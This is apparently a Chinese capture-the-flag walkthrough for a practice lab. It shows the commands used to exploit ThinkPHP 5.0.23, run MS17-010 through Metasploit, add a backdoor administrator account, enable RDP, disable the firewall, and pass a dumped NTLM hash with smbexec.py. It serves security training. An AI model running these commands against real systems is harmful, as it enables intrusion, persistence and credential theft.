cyberstrikelab通关记录-lab1

admin 2025年3月24日23:09:21评论11 views字数 1813阅读6分2秒阅读模式

信息收集

先来看看fscan的扫描记录

cyberstrikelab通关记录-lab1
img

发现有thinkphp。

thinkphp 5.0.23

cyberstrikelab通关记录-lab1
img

直接getshell。拿到一个flag

cyberstrikelab通关记录-lab1
img

内网渗透

上传fscan扫扫内网,还有代理。

cyberstrikelab通关记录-lab1
img
192.168.20.10:135 open192.168.20.30:88 open192.168.20.10:3306 open192.168.20.30:445 open192.168.20.20:445 open192.168.20.10:445 open192.168.20.30:139 open192.168.20.20:139 open192.168.20.10:139 open192.168.20.30:135 open192.168.20.20:135 open192.168.20.10:80 open[*] NetBios 192.168.20.10   WORKGROUPWIN-KOHRC1DGOL9           Windows Server 2012 R2 Standard 9600[*] NetInfo [*]192.168.20.20   [->]cyberweb   [->]192.168.20.20[+] MS17-010 192.168.20.30    (Windows Server 2008 R2 Standard 7600)[*] NetInfo [*]192.168.20.30   [->]WIN-7NRTJO59O7N   [->]192.168.20.30[+] MS17-010 192.168.20.20    (Windows Server 2012 R2 Standard 9600)[*] NetBios 192.168.20.20   cyberweb.cyberstrikelab.com         Windows Server 2012 R2 Standard 9600[*] WebTitle [http://192.168.20.10](http://192.168.20.10/)      code:200 len:25229  title:易优CMS -  Powered by Eyoucms.com[+] PocScan [http://192.168.20.10](http://192.168.20.10/) poc-yaml-thinkphp5023-method-rce poc1

可以看到内网有一个cms,还有一个ms17010,咱们把代理搭起来看看

ms17_010

拿msf打一下试试

proxychains4 msfconsole use exploit/windows/smb/ms17_010_eternalblue set payload windows/x64/meterpreter/bind_tcp_uuid set RHOSTS 172.22.1.21 exploit

拿不到shell,那就换一个打法,去执行命令试试

use admin/smb/ms17_010_commandset rhosts 192.168.20.30set command type c:\flag.txt

可以直接获取flag。给他开个3389然后连接上去dump下hash,在这之前先添加个后门用户

set command net user ocean admin@123 /addset COMMAND net localgroup Administrators ocean /addset COMMAND 'REG ADD HKLMSYSTEMCurrentControlSetControlTerminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f'set COMMAND netsh firewall set opmode disable

这里我登录不上不知道为什么,后来查资料和看别的博客才知道,登录域控要在用户名前加上.

cyberstrikelab通关记录-lab1
img

也算是登录上了,抓一下hash,打个pth直接就完事了,但是没有抓到域管的hash,。所以需要提权去拿hash

proxychains4 python3 smbexec.py -hashes :94bd5248e87cb7f2f9b871d40c903927 cyberstrikelab.com/[email protected] 

拿到shell直接读取flag即可

原文始发于微信公众号(0xh4ck3r):cyberstrikelab通关记录-lab1

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2025年3月24日23:09:21
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   cyberstrikelab通关记录-lab1https://cn-sec.com/archives/3880423.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息